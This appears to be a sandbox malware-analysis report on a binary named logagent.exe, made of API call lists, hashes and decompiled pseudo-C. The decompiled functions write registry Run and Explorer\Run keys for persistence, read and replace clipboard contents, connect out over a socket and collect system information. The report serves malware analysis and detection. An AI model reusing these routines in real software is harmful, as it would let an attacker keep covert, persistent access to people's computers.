                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,00000000), ref: 004037A7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000), ref: 004037B4
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004037C0
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004037C9
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004037D2
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004037DB
                                  • lstrlenA.KERNEL32(00000000), ref: 004037E2
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004037F8
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00403FC8), ref: 00403801
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00403FC8), ref: 0040380A
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@D@2@@0@Hstd@@V01@@V10@V?$basic_string@$??4?$basic_string@?c_str@?$basic_string@?data@?$basic_string@DriveTypeV01@_itoalstrlen
                                  • String ID:
                                  • API String ID: 3966177967-0
                                  • Opcode ID: 2ed17a773f70f2a2b96c76149902b1bc02ebe8e478459ea86c20583d4a86547d
                                  • Instruction ID: 4300f458e19456516dd56dc641f8d1b829b254aea369022c8032761b79b8ee60
                                  • Opcode Fuzzy Hash: 2ed17a773f70f2a2b96c76149902b1bc02ebe8e478459ea86c20583d4a86547d
                                  • Instruction Fuzzy Hash: B721ADB580060DEBCB05EBE0ED5DDDE777CAF54346B108025F912A3160EB746B49CB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 68%
                                  			E00407D53(void* __ecx, char _a4, char _a8, char _a12, char _a16) {
                                  				char _v20;
                                  				void* _t13;
                                  				void* _t15;
                                  				char* _t26;
                                  				void* _t27;
                                  				void* _t32;
                                  				void* _t35;
                                  
                                  				_t26 = "\"";
                                  				if(_a4 == 1) {
                                  					_t35 = _t27 - 0x10;
                                  					L0041416A();
                                  					L00414146();
                                  					_t3 =  &_a16; // 0x415a24
                                  					_t13 = E0040B7B9(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\",  *_t3, _t35,  &_v20,  &_v20, _t26, 0x41ba28);
                                  					_t27 = _t35 + 0x38;
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_t26, 1);
                                  				}
                                  				if(_a8 == 1) {
                                  					_t32 = _t27 - 0x10;
                                  					L0041416A();
                                  					L00414146();
                                  					_t7 =  &_a16; // 0x415a24
                                  					_t13 = E0040B7B9(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\",  *_t7, _t32,  &_v20,  &_v20, _t26, 0x41ba28);
                                  					_t27 = _t32 + 0x38;
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_t26, 1);
                                  				}
                                  				if(_a12 == 1) {
                                  					L0041416A();
                                  					L00414146();
                                  					_t15 = E0040B7B9(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", _a16, _t27 - 0x10,  &_v20,  &_v20, _t26, 0x41ba28);
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_t26, 1);
                                  					return _t15;
                                  				}
                                  				return _t13;
                                  			}

                                  APIs
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,00415628,0041BA28,00415628,00000001,C:\Windows\SysWOW64\logagent.exe,0041BA28,00415A24,?,00408003), ref: 00407D7A
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,C:\Windows\SysWOW64\logagent.exe), ref: 00407DA4
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,C:\Windows\SysWOW64\logagent.exe,0041BA28,00415A24,?,00408003), ref: 00407D84
                                    • Part of subcall function 0040B7B9: RegCreateKeyW.ADVAPI32(?,80000002,80000002), ref: 0040B7C6
                                    • Part of subcall function 0040B7B9: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00415628,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Windows\SysWOW64\logagent.exe,0041BA28), ref: 0040B7D5
                                    • Part of subcall function 0040B7B9: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Windows\SysWOW64\logagent.exe,0041BA28), ref: 0040B7E3
                                    • Part of subcall function 0040B7B9: RegSetValueExW.ADVAPI32(80000002,00407E26,00000000,?,00000000,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24), ref: 0040B7F6
                                    • Part of subcall function 0040B7B9: RegCloseKey.ADVAPI32(80000002,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Windows\SysWOW64\logagent.exe,0041BA28), ref: 0040B801
                                    • Part of subcall function 0040B7B9: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Windows\SysWOW64\logagent.exe,0041BA28,00415A24), ref: 0040B810
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,00415628,0041BA28,00415628,00000001,C:\Windows\SysWOW64\logagent.exe,0041BA28,00415A24), ref: 00407DBE
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,C:\Windows\SysWOW64\logagent.exe,0041BA28,00415A24), ref: 00407DC8
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,C:\Windows\SysWOW64\logagent.exe), ref: 00407DE8
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(00000001,00415628,0041BA28,00415628,00000001,C:\Windows\SysWOW64\logagent.exe,0041BA28,00415A24), ref: 00407E02
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,C:\Windows\SysWOW64\logagent.exe,0041BA28,00415A24), ref: 00407E0C
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,C:\Windows\SysWOW64\logagent.exe), ref: 00407E2C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: G@std@@U?$char_traits@V?$allocator@$G@2@@0@G@2@@std@@Hstd@@V?$basic_string@$??1?$basic_string@$V10@V10@@$?c_str@?$basic_string@?length@?$basic_string@CloseCreateValue
                                  • String ID: $ZA$C:\Windows\SysWOW64\logagent.exe$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\
                                  • API String ID: 111787555-1532410975
                                  • Opcode ID: e235326932527ed2226d8983e4f804bb91d78ac99fb475050114bcfa4d032180
                                  • Instruction ID: d86c43b3a5ba32eb059a2cdc2ec90b1b4ffa6c8f934f2ed61d0225c93748e370
                                  • Opcode Fuzzy Hash: e235326932527ed2226d8983e4f804bb91d78ac99fb475050114bcfa4d032180
                                  • Instruction Fuzzy Hash: EE215A72D00114BBD710BAA69C4AEFB7F2CDF91354F440429F91962182E6BA8994C7E6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 64%
                                  			E00413C3F(void* __ecx, struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                  				struct tagPOINT _v12;
                                  				void* _t16;
                                  				struct HMENU__* _t17;
                                  				void* _t20;
                                  				void* _t24;
                                  
                                  				_t16 = _a8 - 1;
                                  				if(_t16 == 0) {
                                  					_t17 = CreatePopupMenu();
                                  					 *0x41c1f0 = _t17;
                                  					AppendMenuA(_t17, 0, 0, "Close");
                                  					L15:
                                  					return 0;
                                  				}
                                  				_t20 = _t16 - 0x110;
                                  				if(_t20 == 0) {
                                  					if(_a12 != 0) {
                                  						goto L15;
                                  					}
                                  					Shell_NotifyIconA(2, 0x41c200);
                                  					ExitProcess(0);
                                  				}
                                  				if(_t20 == 0x2f0) {
                                  					_t24 = _a16 - 0x201;
                                  					if(_t24 == 0) {
                                  						if(IsWindowVisible( *0x41c1fc) == 0) {
                                  							ShowWindow( *0x41c1fc, 9);
                                  							SetForegroundWindow( *0x41c1fc);
                                  						} else {
                                  							ShowWindow( *0x41c1fc, 0);
                                  						}
                                  						goto L15;
                                  					}
                                  					if(_t24 == 3) {
                                  						GetCursorPos( &_v12);
                                  						SetForegroundWindow(_a4);
                                  						TrackPopupMenu( *0x41c1f0, 0, _v12, _v12.y, 0, _a4, 0);
                                  						goto L15;
                                  					}
                                  					_push(_a16);
                                  					_push(_a12);
                                  					_push(0x401);
                                  					L4:
                                  					return DefWindowProcA(_a4, ??, ??, ??);
                                  				}
                                  				_push(_a16);
                                  				_push(_a12);
                                  				_push(_a8);
                                  				goto L4;
                                  			}

                                  APIs
                                  • DefWindowProcA.USER32(?,00000401,?,?), ref: 00413C6C
                                  • GetCursorPos.USER32(?), ref: 00413C97
                                  • SetForegroundWindow.USER32(?), ref: 00413CA0
                                  • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 00413CBB
                                  • Shell_NotifyIconA.SHELL32(00000002,0041C200), ref: 00413D0C
                                  • ExitProcess.KERNEL32 ref: 00413D14
                                  • CreatePopupMenu.USER32 ref: 00413D1C
                                  • AppendMenuA.USER32 ref: 00413D31
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                  • String ID: Close
                                  • API String ID: 1657328048-3535843008
                                  • Opcode ID: 9fa95a8da91032cbadd5b612f76443252f964982233fd8ca9fbdea8ba32e519c
                                  • Instruction ID: 3a9117e372e52b2e565462b42d507c4b1172ca251bbe850fbb6b863f13e0a9c7
                                  • Opcode Fuzzy Hash: 9fa95a8da91032cbadd5b612f76443252f964982233fd8ca9fbdea8ba32e519c
                                  • Instruction Fuzzy Hash: 3A210972180609FBDB115FA4ED0DBEA3F35FB08702F208021F606A51B1D7799AA0EB5D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00000000), ref: 0040E91D
                                    • Part of subcall function 00402010: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?,?,0040E823,00000001,?,00000000), ref: 0040201E
                                    • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040E845
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                    • Part of subcall function 0041228F: GlobalMemoryStatusEx.KERNEL32(?), ref: 004122A0
                                    • Part of subcall function 0041230A: GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,?,0041B320), ref: 0041231D
                                    • Part of subcall function 0041230A: GetProcAddress.KERNEL32(00000000), ref: 00412324
                                    • Part of subcall function 0041230A: Sleep.KERNEL32(000003E8,?,0041B320), ref: 0041233F
                                    • Part of subcall function 0041230A: __aulldiv.LIBCMT ref: 004123E4
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000001,?,00000095), ref: 0040E87F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000008,?,00000000), ref: 0040E898
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000008,z@,00000000), ref: 0040E8AC
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040E8B7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040E8C1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000096), ref: 0040E8DE
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E8E7
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E8F0
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E8F9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@??1?$basic_string@$D@1@@$D@2@@0@Hstd@@V01@@V10@0@V?$basic_string@$AddressGlobalHandleMemoryModuleProcSleepStatus__aulldivconnect
                                  • String ID: z@
                                  • API String ID: 1937136672-317290069
                                  • Opcode ID: d74b99179c0ec3edfaf413329de15268db7073bfc3635b63cbd5e7f7129ca5fd
                                  • Instruction ID: 66f006b43ec3188ac29da0c8503291dee518f3a81564da720cf043436550991c
                                  • Opcode Fuzzy Hash: d74b99179c0ec3edfaf413329de15268db7073bfc3635b63cbd5e7f7129ca5fd
                                  • Instruction Fuzzy Hash: E1318472C0010CEBDB01EBA1DD49EDEB778AB54305F00416AFA12A70D1EFB55B48CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 65%
                                  			E1054FA22(intOrPtr* __ecx) {
                                  				void* _t13;
                                  				void* _t22;
                                  				signed int _t23;
                                  				void* _t24;
                                  				void* _t33;
                                  				struct HWND__* _t39;
                                  				unsigned int _t50;
                                  				signed int _t51;
                                  				void* _t68;
                                  				void* _t69;
                                  				void* _t70;
                                  
                                  				_push(_t39);
                                  				_t13 =  *__ecx();
                                  				_t77 = _t13;
                                  				if(_t13 != 0) {
                                  					EmptyClipboard();
                                  					E1054319B(_t70 - 0x10, _t77, _t39);
                                  					_t22 = GlobalAlloc(0x2000,  *0x4152e4() + 1);
                                  					 *(_t70 + 8) = _t22;
                                  					GlobalFix(_t22);
                                  					 *(_t70 - 0x24) = _t22;
                                  					_t23 = E1054319B(_t70 - 0x10, _t77, _t39);
                                  					_t24 =  *0x415344();
                                  					asm("repne scasb");
                                  					_t50 =  !(_t23 | 0xffffffff);
                                  					_t68 = _t24 - _t50;
                                  					_t51 = _t50 >> 2;
                                  					memcpy(_t68 + _t51 + _t51, _t68, memcpy( *(_t70 - 0x24), _t68, _t51 << 2) & 0x00000003);
                                  					GlobalUnWire( *(_t70 + 8));
                                  					SetClipboardData(1,  *(_t70 + 8));
                                  					CloseClipboard();
                                  					if(OpenClipboard(_t39) != 0) {
                                  						_t33 = GetClipboardData(1);
                                  						_t69 = _t33;
                                  						GlobalFix(_t69);
                                  						_t66 = _t33;
                                  						GlobalUnWire(_t69);
                                  						CloseClipboard();
                                  						if(_t33 == _t39) {
                                  							_t66 = 0x415664;
                                  						}
                                  						 *0x415318(_t70 - 0x25);
                                  						E10543A51(0x41be70, 0x6b, _t66);
                                  					}
                                  				}
                                  				E1054316C(_t70 - 0x10);
                                  				 *0x415348();
                                  				 *0x415348();
                                  				return 0;
                                  			}

                                  APIs
                                  • EmptyClipboard.USER32 ref: 1054FA2D
                                  • GlobalAlloc.KERNEL32(00002000,00000001), ref: 1054FA4B
                                  • GlobalFix.KERNEL32(00000000), ref: 1054FA55
                                  • GlobalUnWire.KERNEL32(?), ref: 1054FA92
                                  • SetClipboardData.USER32(00000001,?), ref: 1054FA9D
                                  • CloseClipboard.USER32 ref: 1054FAB6
                                  • OpenClipboard.USER32 ref: 1054FABD
                                  • GetClipboardData.USER32(00000001), ref: 1054FACD
                                  • GlobalFix.KERNEL32(00000000), ref: 1054FAD6
                                  • GlobalUnWire.KERNEL32(00000000), ref: 1054FADF
                                  • CloseClipboard.USER32 ref: 1054FAE5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
• Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Clipboard$Global$CloseDataWire$AllocEmptyOpen
                                  • String ID: dVA
                                  • API String ID: 4263304124-1571107130
                                  • Opcode ID: 1bb065fe989b23a641558362fa85ee87d19fbb2bc5e4e8c1d754e8d2f4c688a1
                                  • Instruction ID: 1d314066b2b0daa76572c3b27bd6c1bae32cb7c7e69ae64d1213680c89ba8cc8
                                  • Opcode Fuzzy Hash: 1bb065fe989b23a641558362fa85ee87d19fbb2bc5e4e8c1d754e8d2f4c688a1
                                  • Instruction Fuzzy Hash: 8B212D32610505DBDB04ABF4DC5DAEE3AA9EB88352B508429F917D71A0EB708944CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,HKLM,00000004,?,0040BE54,?,?,00000004), ref: 0040BDAE
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,HKCU,?,?,00000004), ref: 0040BDC6
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BE1E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BE2B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@??8std@@D@2@@0@D@2@@std@@V?$basic_string@
                                  • String ID: HKCC$HKCR$HKCU$HKLM$HKU
                                  • API String ID: 2054586871-62392802
                                  • Opcode ID: a466e65ffd345a8b6a55af1eb436ab666088b088688f1f759b6253a5e0949071
                                  • Instruction ID: 2660231c1808b36434503ece8d2e95605cb547f4994df65369f224bebc220479
                                  • Opcode Fuzzy Hash: a466e65ffd345a8b6a55af1eb436ab666088b088688f1f759b6253a5e0949071
                                  • Instruction Fuzzy Hash: 8D01C43A58122AA2CE049AD0EC01ADA7708CF057B2F71007BAE04B76C0CB38D9854BCD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 0040B5A2: RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,80000000), ref: 0040B5C3
                                    • Part of subcall function 0040B5A2: RegQueryValueExW.ADVAPI32(80000000,00412203,00000000,00000000,?,00000400), ref: 0040B5E2
                                    • Part of subcall function 0040B5A2: RegCloseKey.ADVAPI32(80000000), ref: 0040B5EB
                                    • Part of subcall function 0040B5A2: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415800,?), ref: 0040B60A
                                  • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(.exe,00000000,?,?,?,?,?,?,?,?,?,00409BE6,?,00000000), ref: 00412210
                                  • ?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,-00000004,?,?,?,?,?,?,?,?,?,00409BE6,?,00000000), ref: 00412223
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,00409BE6,?,00000000), ref: 0041222D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00409BE6,?,00000000), ref: 00412236
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00409BE6,?), ref: 0041224F
                                    • Part of subcall function 0041290A: ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(?,00000000,6DF7CB60,?,?,0041225E,?), ref: 00412919
                                    • Part of subcall function 0041290A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,?,?,0041225E,?), ref: 00412937
                                    • Part of subcall function 0041290A: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,0041225E,?), ref: 0041293F
                                    • Part of subcall function 0041290A: ?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z.MSVCP60(00000000,00000000,?,?,0041225E,?), ref: 0041294A
                                    • Part of subcall function 0041290A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,?,?,0041225E,?), ref: 00412954
                                    • Part of subcall function 0041290A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,0041225E,?), ref: 0041295D
                                    • Part of subcall function 0041290A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,0041225E,?), ref: 00412975
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00412265
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0041226E
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0041227B
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00412284
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$G@2@@std@@G@std@@U?$char_traits@$??0?$basic_string@??1?$basic_string@V01@@$??4?$basic_string@?find@?$basic_string@G@1@@V01@V12@$?length@?$basic_string@?replace@?$basic_string@?substr@?$basic_string@CloseOpenQueryValue
                                  • String ID: .exe$http\shell\open\command
                                  • API String ID: 2647146128-4091164470
                                  • Opcode ID: 252b6526ca8ce19ecb12a8c89719758da3f71089f7038446805540d7e0c89632
                                  • Instruction ID: d6ae35875aa51399811599ff5055279212e103e4be7b08956a6055bd29980306
                                  • Opcode Fuzzy Hash: 252b6526ca8ce19ecb12a8c89719758da3f71089f7038446805540d7e0c89632
                                  • Instruction Fuzzy Hash: F011127291061DEBCF04EBE0EC49FFD7738FB48304F544425F512A21A0DA74A148CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004), ref: 10552D68
                                  • GetLastError.KERNEL32 ref: 10552DD1
                                  • malloc.MSVCRT ref: 10552DE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLastManagerOpenmalloc
                                  • String ID:
                                  • API String ID: 4129629542-0
                                  • Opcode ID: 7436737d771e6f94204cdcbc6dd436a297a8087e31d0d939b25b7b7780cd4931
                                  • Instruction ID: a50f86551d48fcfb420bec0d8969bad93b6fe5ccc4e0857a432ebec01e6f54a5
                                  • Opcode Fuzzy Hash: 7436737d771e6f94204cdcbc6dd436a297a8087e31d0d939b25b7b7780cd4931
                                  • Instruction Fuzzy Hash: 4BA1FA72C0051EEFCB159B90EC98EEEBB78FF48345F148066F516A6060EB716A49CF54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00410020
                                  • EnumDisplayMonitors.USER32(00000000,00000000,0041010A,00000000), ref: 0041003D
                                  • EnumDisplayDevicesW.USER32(00000000,00000000,00000148,00000000), ref: 0041004D
                                  • EnumDisplayDevicesW.USER32(?,00000000,?,00000000), ref: 00410078
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,0041623C), ref: 00410095
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004100A0
